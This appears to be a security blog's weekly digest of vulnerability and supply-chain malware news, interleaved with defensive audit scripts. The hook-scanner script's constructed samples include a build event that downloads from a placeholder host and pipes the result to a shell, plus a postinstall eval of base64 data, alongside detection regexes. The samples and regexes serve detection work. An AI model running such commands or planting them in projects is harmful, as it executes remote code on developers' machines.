
Human Factor Blog

how human behavior affects security

Programmer’s Digest #140

06/18/2025-06/25/2025 200+ Trojanized GitHub Repositories, New Linux Flaws Grant Full Root Access, Hackers Exploit Misconfigured Docker APIs And More.

1. 200+ Trojanized GitHub Repositories Found in Campaign Targeting Gamers and Developers

Cybersecurity researchers have uncovered a malicious campaign involving over 67 GitHub repositories posing as Python-based hacking tools but delivering trojanized payloads. Dubbed Banana Squad by ReversingLabs, the campaign is linked to a 2023 effort that targeted the Python Package Index (PyPI) with similar tactics. These repositories impersonate popular tools like Discord cleaners, Fortnite cheats, and TikTok checkers, aiming to lure users searching for such software. Once downloaded, the payloads steal data, inject code into cryptocurrency apps, and establish remote access. The threat actors also abuse GitHub’s trust system by using fake stars and forks to boost visibility. Related campaigns like Water Curse and Stargazers Ghost Network exploit GitHub to distribute malware, often targeting gamers and novice hackers.

Sophos identified 133 repositories using techniques like Visual Studio PreBuild backdoors. The broader trend reflects a growing malware distribution model leveraging open-source platforms. Developers are urged to verify repository integrity before use.

2. New Linux Flaws Grant Full Root Access Across Major Distributions

Security researchers have discovered two major vulnerabilities in Linux that allow attackers to escalate privileges and gain full root access. The flaws (CVE-2025-6018 and CVE-2025-6019) impact major distributions including Ubuntu, Debian, Fedora, and openSUSE. Attackers can chain the two flaws to escalate from a basic GUI or SSH session to full root access. The attack leverages udisks loop mounts and PAM quirks to bypass polkit trust zones.

Who Is Affected:

  • CVE-2025-6018 affects openSUSE Leap 15 and SUSE Linux Enterprise 15.
  • CVE-2025-6019 impacts libblockdev via the udisks daemon, which is installed by default on most Linux systems.

Once exploited, an attacker can disable security tools, install rootkits, or establish persistent access.

Patch Immediately: Linux vendors are releasing updates. Users should apply security patches as soon as possible and, as an interim mitigation, modify the polkit rule for org.freedesktop.udisks2.modify-device so that it requires auth_admin, which blocks the action for unprivileged users.
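The interim polkit mitigation above is easy to state and easy to get wrong (a rule file that is not world-readable, or one that never gets loaded). The script below, an added example that is not from the digest or from any vendor advisory, audits a polkit rules directory for a rule tying org.freedesktop.udisks2.modify-device to AUTH_ADMIN and writes one if none is found. The rule body is the auth_admin rule the digest describes; the file name, the default directory and the text-matching heuristic are assumptions made for this example.

```python
"""Audit /etc/polkit-1/rules.d for the udisks2 modify-device AUTH_ADMIN rule
and write it when missing.  Added example; file name and heuristics are
assumptions, not part of any distribution's packaging."""
import os
import tempfile

ACTION_ID = "org.freedesktop.udisks2.modify-device"
RULE_FILENAME = "10-udisks2-modify-device.rules"   # assumed name; any *.rules file is loaded
DEFAULT_RULES_DIR = "/etc/polkit-1/rules.d"

# polkit rules are JavaScript; this one makes every request for the action
# prompt for administrator authentication instead of relying on the
# "active local session" trust zone the attack chain abuses.
ADMIN_RULE = f"""\
// Require admin authentication before udisks2 may modify a device
// (interim mitigation until the fixed libblockdev/udisks packages are installed).
polkit.addRule(function(action, subject) {{
    if (action.id == "{ACTION_ID}") {{
        return polkit.Result.AUTH_ADMIN;
    }}
}});
"""


def rule_files(rules_dir):
    """All *.rules files in rules_dir, in the lexical order polkit loads them."""
    if not os.path.isdir(rules_dir):
        return []
    names = sorted(n for n in os.listdir(rules_dir) if n.endswith(".rules"))
    return [os.path.join(rules_dir, n) for n in names]


def has_admin_rule(rules_dir):
    """True if some rule file mentions ACTION_ID together with an AUTH_ADMIN
    result.  This is a text heuristic, not a polkit evaluation: a file that
    names the action only in a comment would also match, so treat True as
    'a rule exists, read it', not as proof the mitigation is effective."""
    for path in rule_files(rules_dir):
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        if ACTION_ID in text and "polkit.Result.AUTH_ADMIN" in text:
            return True
    return False


def write_admin_rule(rules_dir):
    """Write the AUTH_ADMIN rule into rules_dir and return the path written."""
    os.makedirs(rules_dir, mode=0o755, exist_ok=True)
    path = os.path.join(rules_dir, RULE_FILENAME)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(ADMIN_RULE)
    os.chmod(path, 0o644)          # polkit ignores rule files it cannot read
    return path


def ensure_admin_rule(rules_dir=DEFAULT_RULES_DIR):
    """Return None if a matching rule already exists, else write one and return its path."""
    if has_admin_rule(rules_dir):
        return None
    return write_admin_rule(rules_dir)


def self_check():
    """Exercise audit -> remediate -> audit in a scratch directory.
    Returns (present_before, file_written, present_after, second_run_is_noop)."""
    scratch = tempfile.mkdtemp(prefix="polkit-rules-")
    before = has_admin_rule(scratch)
    path = ensure_admin_rule(scratch)
    after = has_admin_rule(scratch)
    noop = ensure_admin_rule(scratch) is None
    return before, path is not None and os.path.isfile(path), after, noop


if __name__ == "__main__":
    written = ensure_admin_rule()   # needs root to write under /etc/polkit-1
    print(f"wrote {written}" if written else "an AUTH_ADMIN rule for the action is already present")
```

Run it as root after the distribution packages are updated, and remove the rule file again once udisks and libblockdev are confirmed fixed, since it also makes legitimate removable-media operations prompt for a password.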

3. Hackers Exploit Misconfigured Docker APIs to Mine Cryptocurrency via Tor Network

Misconfigured Docker instances are being exploited in a new cryptojacking campaign that uses the Tor network to hide attacker activity. Attackers abuse exposed Docker APIs to access containerized environments, deploy crypto miners, and mask their origin via Tor.

The attack begins with a request from IP 198.199.72[.]27 to list containers. If none exist, a new one is created using the “alpine” image, with the host’s root directory mounted inside—allowing dangerous access to the host system. A Base64-encoded script installs Tor and fetches a remote payload from a .onion domain. The attacker then modifies SSH settings to enable root login, installs tools like masscan and torsocks, and delivers an XMRig miner. All traffic is routed through Tor for anonymity. Targets include tech, finance, and healthcare sectors. Separately, Wiz found hundreds of leaked credentials in public code repositories, posing major risks to over 30 companies—including Fortune 100 firms.
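Two of the conditions in the chain above are cheap to audit from the host: a Docker daemon listening on plain TCP, and a container whose bind mounts expose the host root directory. The script below is an added example, not code from the digest or from the Docker project; its inputs are constructed samples shaped like /etc/docker/daemon.json and the JSON that `docker inspect` prints, and the sample container names and images are made up.

```python
"""Audit Docker daemon config and container mounts for the two misconfigurations
the cryptojacking campaign relies on.  Added example with constructed inputs."""
import json

# --- constructed samples (not real hosts or containers) -------------------
SAMPLE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "Config": {"Image": "nginx:1.27"},
     "Mounts": [{"Type": "bind", "Source": "/srv/www",
                 "Destination": "/usr/share/nginx/html"}]},
    {"Name": "/suspicious", "Config": {"Image": "alpine"},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostroot"}]},
])


def tcp_listeners_without_tls(daemon_json_text):
    """Return tcp:// entries from daemon.json 'hosts' when TLS client
    verification is not enforced (tlsverify absent or false).  An empty
    list means nothing to report."""
    cfg = json.loads(daemon_json_text)
    if cfg.get("tlsverify") is True:
        return []
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]


def host_root_mounts(inspect_json_text):
    """Return (container, destination) pairs for bind mounts whose source is
    the host's root directory.  Uses the normalised 'Mounts' list rather than
    HostConfig.Binds so each mount is counted once."""
    findings = []
    for container in json.loads(inspect_json_text):
        name = container.get("Name", "").lstrip("/")
        for mount in container.get("Mounts", []):
            if mount.get("Type") == "bind" and mount.get("Source") == "/":
                findings.append((name, mount.get("Destination")))
    return findings


def audit(daemon_json_text, inspect_json_text):
    """Combine both checks into one report dict."""
    return {
        "plain_tcp_listeners": tcp_listeners_without_tls(daemon_json_text),
        "host_root_mounts": host_root_mounts(inspect_json_text),
    }


if __name__ == "__main__":
    # Real usage: python3 audit.py /etc/docker/daemon.json <(docker inspect $(docker ps -aq))
    import sys
    daemon = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DAEMON_JSON
    inspect = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_INSPECT
    print(json.dumps(audit(daemon, inspect), indent=2))
```

One caveat: the daemon's listen address can also be set with `-H` in the systemd unit or an override drop-in instead of daemon.json, so an empty `plain_tcp_listeners` result should be confirmed with `ss -ltnp` on the host.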

4. Cloudflare Blocks Record 7.3 Tbps DDoS Attack Against Hosting Provider

In May 2025, Cloudflare mitigated a record-breaking DDoS attack that peaked at 7.3 Tbps—12% larger than the previous record. The 45-second attack targeted a hosting provider, generating 37.4 TB of traffic, equivalent to 7,500 hours of HD streaming.

The attack came from over 122,000 IPs across 161 countries, mainly Brazil, Vietnam, Taiwan, and China. It flooded multiple ports—peaking at 34,517 ports/second—using techniques like UDP floods, QOTD and Echo reflection, NTP amplification, and Mirai botnet traffic.

Cloudflare’s automated system, powered by its anycast network and real-time threat detection tools, handled the attack without human intervention, dispersing traffic across 477 global data centers.

Despite 99.996% of the traffic being UDP floods, other vectors probed for weaknesses. Indicators of compromise were added to Cloudflare’s free DDoS Botnet Threat Feed, now used by over 600 organizations.


Programmer’s Digest #139

06/11/2025-06/18/2025 Active Exploitation of Linux Kernel Privilege Escalation Vulnerability, Veeam Patches Critical Vulnerability And More.

1. CISA Warns of Active Exploitation of Linux Kernel Privilege Escalation Vulnerability

CISA has added a Linux kernel vulnerability (CVE-2023-0386, CVSS 7.8) to its KEV catalog, warning it’s being actively exploited. The flaw, patched in early 2023, is an improper ownership bug in the OverlayFS subsystem that allows local privilege escalation. The issue arises when files are copied from a nosuid mount to another mount, letting unprivileged users escalate privileges by creating a root-owned SUID binary. Datadog called the exploit “trivial,” noting it abuses the kernel’s failure to properly check user namespace mappings.

While exact exploitation methods in the wild remain unclear, similar OverlayFS-related flaws—dubbed GameOver(lay)—have been detailed by cloud security firm Wiz, showing they can also grant root access on Unix systems. CISA has mandated all Federal Civilian Executive Branch agencies to apply patches by July 8, 2025, to defend against these active threats.

2. Veeam Patches Critical Vulnerability in Backup & Replication

Veeam has released patches for a critical vulnerability (CVE-2025-23120, CVSS 9.9) in its Backup & Replication software that could allow remote code execution (RCE) by authenticated domain users. The flaw affects version 12.3.0.310 and earlier builds. Users are urged to update to version 12.3.1 (build 12.3.1.1139). The issue stems from insecure deserialization within Veeam’s allow-list mechanism. Improper handling allows attackers to trigger inner deserialization using block-listed classes, enabling code execution.

The vulnerability is linked to CVE-2024-40711, exploited in ransomware attacks, and CVE-2024-42455, which allows arbitrary file deletion by authenticated users. Similar flaws may persist due to the software’s large codebase and weak authentication controls. Attackers could potentially exploit the flaw using modified proof-of-concept code. Veeam’s prior patches relied on block-listing, but deeper structural fixes may be needed.

3. Recent Langflow Vulnerability Exploited by Flodrix Botnet

Threat actors are exploiting CVE-2025-3248, a recently patched vulnerability in Langflow, to deploy the Flodrix botnet. The flaw—added to CISA’s KEV catalog in May—allows unauthenticated remote attackers to execute arbitrary code.

Langflow, a low-code AI workflow platform with over 70,000 GitHub stars, patched the issue in version 1.3.0 released in April. Proof-of-concept (PoC) exploits emerged shortly after, and attackers began scanning for exposed instances.

Trend Micro says the attackers use PoC exploits to gain shell access, perform reconnaissance, and then download and execute Flodrix malware. Once active, the bot connects to a command-and-control (C&C) server to await DDoS commands. Flodrix is an evolution of the LeetHozer malware, featuring enhanced obfuscation, new attack types, and stealth techniques to avoid detection.

GreyNoise has observed over 370 IPs exploiting the flaw, with Censys reporting 1,600 internet-exposed Langflow instances as of mid-June.

4. PyPI, npm, and AI Tools Exploited in Malware Surge Targeting DevOps and Cloud Environments

Researchers have uncovered multiple malware-laced npm packages—such as eslint-config-airbnb-compat, ts-runtime-compat-check, and solders—designed to execute remote code and deliver layered payloads. These packages, now removed, were downloaded thousands of times.

One package used obfuscated scripts and Unicode tricks to install Pulsar RAT, a variant of Quasar RAT, hiding payloads within PNG image pixels. Another triggered code via a post-install script, running a PowerShell command that fetched further malware while evading detection.

Separately, Socket identified cryptocurrency-focused threats—stealers, drainers, and clippers—targeting blockchain projects. AI-assisted coding also introduced risks like slopsquatting, where LLMs hallucinate fake package names that attackers exploit by registering real ones.

Additionally, JFrog discovered chimera-sandbox-extensions on PyPI, a red teaming tool disguised as a helper module. It targeted developer credentials, CI/CD tokens, and macOS JAMF data, using domain generation and staged payloads for stealth.
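Both the Visual Studio PreBuild backdoors in the trojanized GitHub repositories (Digest #140, item 1) and the npm post-install script above run code the moment a developer builds or installs, before anyone reads the source. The scanner below is an added example, not code from the digest or from any of the vendors it names: it lists install-time hooks in a package.json and build events in a .csproj and tags commands that show the shapes mentioned above (encoded PowerShell, downloads piped to a shell, inline eval). The regexes, the hook list and the sample inputs are constructed for this example and will need tuning for a real code base.

```python
"""Surface install/build hooks in package.json and .csproj files and tag
commands worth a manual look.  Added example; patterns and samples are
constructed, not taken from any real package."""
import json
import re
import xml.etree.ElementTree as ET

# npm lifecycle scripts that run on `npm install` without further user action.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristic command shapes, chosen for this example.
SUSPICIOUS = [
    ("powershell encoded command",
     re.compile(r"powershell[^|;&]*\s-(?:e|enc|encodedcommand)\b", re.I)),
    ("base64 decode",
     re.compile(r"base64\s+(?:-d|--decode)|frombase64string", re.I)),
    ("download piped to shell",
     re.compile(r"\b(?:curl|wget|iwr|invoke-webrequest)\b.*\|\s*(?:sh|bash|iex)\b", re.I)),
    ("inline node/eval",
     re.compile(r"\bnode\s+-e\b|\beval\(", re.I)),
]


def tags(command):
    """Labels of every SUSPICIOUS pattern that matches the command."""
    return [label for label, rx in SUSPICIOUS if rx.search(command)]


def scan_package_json(text):
    """(hook, command, tags) for each install-time script in package.json."""
    scripts = json.loads(text).get("scripts", {})
    return [(hook, scripts[hook], tags(scripts[hook]))
            for hook in INSTALL_HOOKS if hook in scripts]


def _local(tag):
    """Strip the MSBuild XML namespace that legacy .csproj files carry."""
    return tag.rsplit("}", 1)[-1]


def scan_csproj(text):
    """(location, command, tags) for PreBuildEvent/PostBuildEvent properties
    and <Exec Command=...> tasks anywhere in the project file."""
    found = []
    for el in ET.fromstring(text).iter():
        name = _local(el.tag)
        if name in ("PreBuildEvent", "PostBuildEvent") and (el.text or "").strip():
            cmd = el.text.strip()
            found.append((name, cmd, tags(cmd)))
        elif name == "Exec" and el.get("Command"):
            cmd = el.get("Command")
            found.append(("Exec", cmd, tags(cmd)))
    return found


# --- constructed samples ----------------------------------------------------
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg", "version": "1.0.0",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"eval(Buffer.from(process.env.P, 'base64').toString())\"",
    },
})

SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <PreBuildEvent>curl -s http://example.invalid/s | sh</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Stamp" BeforeTargets="Build">
    <Exec Command="echo building" />
  </Target>
</Project>"""


if __name__ == "__main__":
    for hit in scan_package_json(SAMPLE_PACKAGE_JSON) + scan_csproj(SAMPLE_CSPROJ):
        print(hit)
```

A hook with an empty tag list is still listed on purpose: the point of the check is that any code running at install or build time deserves a glance, and the tags only order the queue.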


Programmer’s Digest #138

06/04/2025-06/11/2025 CISA Adds RoundCube Webmail and Erlang/OTP SSH Server Flaws, Microsoft Patches 67 Vulnerabilities, New Supply Chain Malware Operation Hits npm and PyPI Ecosystems And More.

1. U.S. CISA Adds RoundCube Webmail and Erlang/OTP SSH Server Flaws to its Known Exploited Vulnerabilities Catalog

CISA has added two critical flaws—CVE-2025-32433 in Erlang/OTP and CVE-2024-42009 in RoundCube Webmail—to its KEV catalog.

CVE-2025-32433 (CVSS 10) affects older Erlang/OTP versions and allows remote code execution via its SSH server without authentication. Systems running versions before OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 are vulnerable. Users should update or disable the SSH server as a temporary fix. CVE-2024-42009 (CVSS 9.3), found by Sonar, is a severe XSS flaw in RoundCube, widely deployed via cPanel. Attackers can execute JavaScript when a victim views a malicious email, enabling email theft, unauthorized sending, and persistent browser access.
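Three fixed versions on three release lines is exactly the kind of comparison that goes wrong when done by eye (26.2.5.3 sorts after 26.2.5.11 as a string). The helper below is an added example, not from the digest or the Erlang/OTP project: it parses an OTP version string and reports whether it predates the fixed release on its line. The fixed versions are the ones the paragraph above lists; how release lines outside 25 to 27 are treated is an assumption noted in the code.

```python
"""Decide whether an Erlang/OTP version predates the CVE-2025-32433 fix.
Added example; only the FIXED table comes from the digest."""
import re

# First fixed release per supported line, as stated above.
FIXED = {27: (27, 3, 3), 26: (26, 2, 5, 11), 25: (25, 3, 2, 20)}


def parse_otp_version(text):
    """'OTP-26.2.5.3' or '26.2.5.3' -> (26, 2, 5, 3)."""
    m = re.fullmatch(r"(?:OTP-)?(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"not an OTP version string: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(text):
    """True if the version is older than the fix on its release line.
    Tuple comparison gives the right order: (26, 2, 5) < (26, 2, 5, 11)."""
    version = parse_otp_version(text)
    fixed = FIXED.get(version[0])
    if fixed is None:
        # Assumption for this example: lines older than OTP 25 received no fix
        # and are treated as affected; OTP 28 and later shipped after the fix.
        return version[0] < 25
    return version < fixed


def classify(versions):
    """Map each version string to 'vulnerable' or 'fixed' for a fleet report."""
    return {v: ("vulnerable" if is_vulnerable(v) else "fixed") for v in versions}


if __name__ == "__main__":
    import sys
    # e.g. python3 otpcheck.py "$(cat /usr/lib/erlang/releases/*/OTP_VERSION)"
    for version, verdict in classify(sys.argv[1:] or ["OTP-27.3.2"]).items():
        print(f"{version}: {verdict}")
```

The full patch-level version is in the OTP_VERSION file under the release directory (erlang:system_info(otp_release) returns only the major number). A vulnerable version matters only where the ssh application is actually started, so pair this check with a look at which applications the node runs before deciding between patching and the interim option of disabling the SSH server.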

These vulnerabilities are actively exploited and must be patched promptly. CISA mandates FCEB agencies address them by the specified deadline, and private organizations are strongly urged to do the same.

2. Cisco Patches Identity Services Engine Flaw Affecting AWS, Azure, OCI

Cisco released patches on June 4 for a critical flaw (CVE-2025-20286) in cloud deployments of Cisco Identity Services Engine (ISE) on AWS, Azure, and Oracle Cloud. The vulnerability allows attackers to access sensitive data, perform limited admin actions, modify configurations, or disrupt services. No active exploitation has been reported yet.

The issue stems from shared admin keys across ISE instances in the same cloud platform and software version, enabling attackers to move laterally across tenants and regions once they compromise one credential. Experts call it a severe “chain-of-trust rupture” that risks widespread takeover.

Security leaders are urged to prioritize patching this flaw immediately. The risk highlights the ongoing challenge of common credentials in enterprise systems and stresses the importance of layered defenses and least-privilege access models to limit damage from breaches.

With multiple critical Cisco patches released recently, teams must focus on vulnerabilities that allow pre-auth access or remote code execution to cloud admin tiers first.

3. Microsoft Patches 67 Vulnerabilities Including WEBDAV Zero-Day Exploited in the Wild

Microsoft has released patches for 67 security flaws, including a critical zero-day (CVE-2025-33053) in WebDAV that is being actively exploited. The flaw allows remote code execution via a malicious URL and has been linked to the Stealth Falcon group, known for targeting Middle Eastern entities. Attackers used a .url file in phishing emails to deliver malware, including a C++ implant named Horus Agent. This tool collects data, downloads files, and injects shellcode. Microsoft also addressed a major Power Automate flaw (CVE-2025-47966) and other significant bugs in Netlogon, SMB, and KDC Proxy. The U.S. CISA has added CVE-2025-33053 to its KEV catalog, mandating federal agencies to patch it by July 1, 2025. CERT/CC also warned about UEFI vulnerabilities that could bypass Secure Boot, allowing malicious code to persist below the OS level. While Microsoft is unaffected by some of these, they pose risks to many UEFI-compliant systems.

4. Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps

Adobe has released patches for 254 security flaws across its software, with 225 affecting Adobe Experience Manager (AEM). These vulnerabilities, mostly stored and DOM-based cross-site scripting (XSS), impact AEM Cloud Service and versions up to 6.5.22. Exploitation could lead to code execution, privilege escalation, or bypassing security features. The issues are fixed in AEM Cloud Service Release 2025.5 and 6.5.23.

Adobe also addressed a critical reflected XSS flaw (CVE-2025-47110, CVSS 9.1) in Adobe Commerce and Magento Open Source that allows arbitrary code execution, along with an improper authorization issue (CVE-2025-43585, CVSS 8.2).

Additional fixes include code execution bugs in InCopy and Substance 3D Sampler. Although none of the flaws are known to be exploited in the wild, Adobe strongly recommends updating to the latest versions to stay protected.

5. Researchers Uncover 20+ Configuration Risks, Including Five CVEs, in Salesforce Industry Cloud

Researchers have uncovered over 20 misconfiguration risks in Salesforce Industry Cloud, exposing sensitive data to unauthorized access. These flaws affect components like FlexCards, Data Mappers, OmniOut, and OmniScripts. Most issues stem from improper customer configurations, not the platform itself.

If unaddressed, the flaws could allow attackers to access encrypted employee and customer data, session details, credentials, and business logic. Salesforce has patched the issues and issued updated configuration guidance.

Key vulnerabilities include exposure of encrypted fields due to missing permission checks (CVE-2025-43697, CVE-2025-43700), guest user access to sensitive settings (CVE-2025-43701), and improper enforcement of required permissions (CVE-2025-43699). A new setting, “EnforceDMFLSAndDataEncryption,” helps mitigate some risks.

Separately, a SQL injection flaw in a default Aura controller could allow attackers to extract database contents. Salesforce confirmed the issue was patched promptly with no signs of exploitation.


6. New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally

Cybersecurity researchers have uncovered a supply chain attack targeting over a dozen GlueStack-related npm packages, introducing malware that allows attackers to run shell commands, take screenshots, and upload files. These packages collectively see nearly 1 million weekly downloads. The first compromise was detected on June 6, 2025. The injected malware, similar to a recent trojan from another npm package, supports new commands to harvest system info and public IP addresses.

Maintainers revoked access tokens and deprecated affected versions. They say the risk of code execution on user systems is low since the affected libraries are frontend-only, but users should still roll back to safe versions. Separately, two malicious npm packages—express-api-sync and system-health-sync-api—were found containing destructive wipers that delete files and steal data, using SMTP for stealthy exfiltration. Additionally, a Python package on PyPI masquerading as an Instagram growth tool harvests credentials and spreads them to bot services, emphasizing the growing threat in software supply chains.
